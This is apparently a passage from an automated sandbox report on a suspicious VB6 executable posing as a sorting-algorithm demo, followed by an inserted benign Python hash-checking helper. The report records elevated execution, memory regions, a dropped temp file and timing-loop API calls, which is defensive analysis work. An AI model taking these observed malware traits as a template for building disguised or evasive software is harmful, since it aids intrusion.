private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #22: oyvhkhw.exe
979 0
Information Value
ID #22
File Name c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
Command Line "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:46, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:22
OS Process Information
»
Information Value
PID 0x3d4
Parent PID 0x200 (c:\windows\syswow64\dllhost.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x6a0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
private_0x00000000000a0000 0x000a0000 0x000affff Private Memory Readable, Writable True False False -
private_0x00000000000b0000 0x000b0000 0x000bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00161fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0027ffff Private Memory Readable, Writable True False False -
locale.nls 0x00280000 0x002e6fff Memory Mapped File Readable False False False -
private_0x00000000002f0000 0x002f0000 0x0039ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x002f0000 0x0032bfff Memory Mapped File Readable False False False -
~df0894a2d8a2a8bfc2.tmp 0x002f0000 0x0036ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
oyvhkhw.exe 0x00400000 0x00451fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000460000 0x00460000 0x0cabffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cac0000 0x0cac0000 0x0cc47fff Pagefile Backed Memory Readable True False False -
private_0x000000000cc60000 0x0cc60000 0x0cc6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000cc70000 0x0cc70000 0x0cdf0fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000000ce00000 0x0ce00000 0x0e1fffff Pagefile Backed Memory Readable True False False -
private_0x000000000e200000 0x0e200000 0x0e5fffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x0e600000 0x0e8cefff Memory Mapped File Readable False False False -
private_0x000000000e8d0000 0x0e8d0000 0x0e97ffff Private Memory Readable, Writable True False False -
private_0x000000000e980000 0x0e980000 0x0eaeffff Private Memory Readable, Writable True False False -
pagefile_0x000000000e980000 0x0e980000 0x0ea5efff Pagefile Backed Memory Readable True False False -
private_0x000000000eab0000 0x0eab0000 0x0eaeffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0ec6ffff Private Memory Readable, Writable True False False -
private_0x000000000eaf0000 0x0eaf0000 0x0eb6ffff Private Memory Readable, Writable True False False -
private_0x000000000ec30000 0x0ec30000 0x0ec6ffff Private Memory Readable, Writable True False False -
pagefile_0x000000000ec70000 0x0ec70000 0x0f06ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000000f070000 0x0f070000 0x0f462fff Pagefile Backed Memory Readable True False False -
staticcache.dat 0x0f470000 0x0fd9ffff Memory Mapped File Readable False False False -
private_0x000000000fda0000 0x0fda0000 0x0fe9ffff Private Memory Readable, Writable True False False -
asycfilt.dll 0x6fcd0000 0x6fce3fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x752d0000 0x7532efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df0894a2d8a2a8bfc2.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1 SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe False
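The Created Files row above describes the 16.00 KB temp file only by its digests. Whether such a file is worth pulling out of the sandbox can often be settled from the hashes alone: a buffer filled with a single constant byte has a fixed digest for a given size, so if all three reported digests reproduce from a constant-filled buffer of that size, the file carried no payload when it was captured. The Python below is an added example and is not part of the VMRay report or its tooling; it embeds the row's size and digests and compares them against candidate fill bytes (0x00, 0xFF and 0x20 are an assumed candidate set, and 16.00 KB is assumed to mean 16 * 1024 bytes).

```python
"""Added example (not VMRay code): decide from reported digests alone whether a
dropped file is a constant-filled buffer, e.g. 16 KiB of null bytes."""
import hashlib

# Copied from the Created Files row above; 16.00 KB is taken to mean 16 * 1024 bytes.
REPORTED = {
    "size": 16 * 1024,
    "md5": "ce338fe6899778aacfc28414f2d9498b",
    "sha1": "897256b6709e1a4da9daba92b6bde39ccfccd8c1",
    "sha256": "4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe",
}

# Candidate fill bytes to try (assumption: the usual values for scratch files).
CANDIDATE_FILLS = (0x00, 0xFF, 0x20)


def digests(data):
    """MD5, SHA-1 and SHA-256 of data, keyed by the names the report prints."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def identify_constant_fill(size, md5=None, sha1=None, sha256=None, fills=CANDIDATE_FILLS):
    """Return the fill byte whose size-byte buffer reproduces every supplied digest.

    Returns None if no candidate fill matches. At least one digest must be given;
    every given digest must agree, so one miscopied hash cannot cause a match.
    """
    wanted = {k: v.lower() for k, v in (("md5", md5), ("sha1", sha1), ("sha256", sha256)) if v}
    if not wanted:
        raise ValueError("at least one digest is required")
    for fill in fills:
        computed = digests(bytes([fill]) * size)
        if all(computed[k] == v for k, v in wanted.items()):
            return fill
    return None


if __name__ == "__main__":
    fill = identify_constant_fill(**REPORTED)
    if fill is None:
        print("digests do not match a constant fill; the dump has real content")
    else:
        print(f"file is {REPORTED['size']} bytes of 0x{fill:02x}; nothing to extract")
```

Run identify_constant_fill(**REPORTED): a returned fill byte means the dumped file is just that byte repeated and the memory-mapped copy at 0x002f0000 holds nothing to carve; None means the content is real and the dump is worth opening.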
Threads
Thread 0x6a0
845 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x75a52055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75a25934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x75a259b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x75a7f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x75a7d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x75a7d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x752d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 246096028 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Fn
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273922 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273937 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273968 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273984 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274000 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274031 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274031 True 1
Fn
System Get Time type = Ticks, time = 274046 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274046 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274062 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274078 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274093 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274109 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274109 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274124 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274140 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274156 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274171 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274187 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274202 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274202 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274218 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274234 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274249 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274265 True 25
Fn
System Get Time type = Ticks, time = 274280 True 35
Fn
System Get Time type = Ticks, time = 274296 True 40
Fn
System Get Time type = Ticks, time = 274312 True 40
Fn
System Get Time type = Ticks, time = 274327 True 35
Fn
System Get Time type = Ticks, time = 274343 True 35
Fn
System Get Time type = Ticks, time = 274358 True 40
Fn
System Get Time type = Ticks, time = 274374 True 40
Fn
System Get Time type = Ticks, time = 274390 True 40
Fn
System Get Time type = Ticks, time = 274405 True 26
Fn
System Get Time type = Ticks, time = 274421 True 19
Fn
System Get Time type = Ticks, time = 274436 True 40
Fn
System Get Time type = Ticks, time = 274452 True 40
Fn
System Get Time type = Ticks, time = 274468 True 39
Fn
System Get Time type = Ticks, time = 274483 True 37
Fn
System Get Time type = Ticks, time = 274499 True 39
Fn
System Get Time type = Ticks, time = 274514 True 40
Fn
System Get Time type = Ticks, time = 274530 True 25
Fn
System Get Time type = Ticks, time = 274546 True 16
Fn
System Get Time type = Ticks, time = 274561 True 16
Fn
System Get Time type = Ticks, time = 274577 True 16
Fn
System Get Time type = Ticks, time = 274592 True 10
Fn
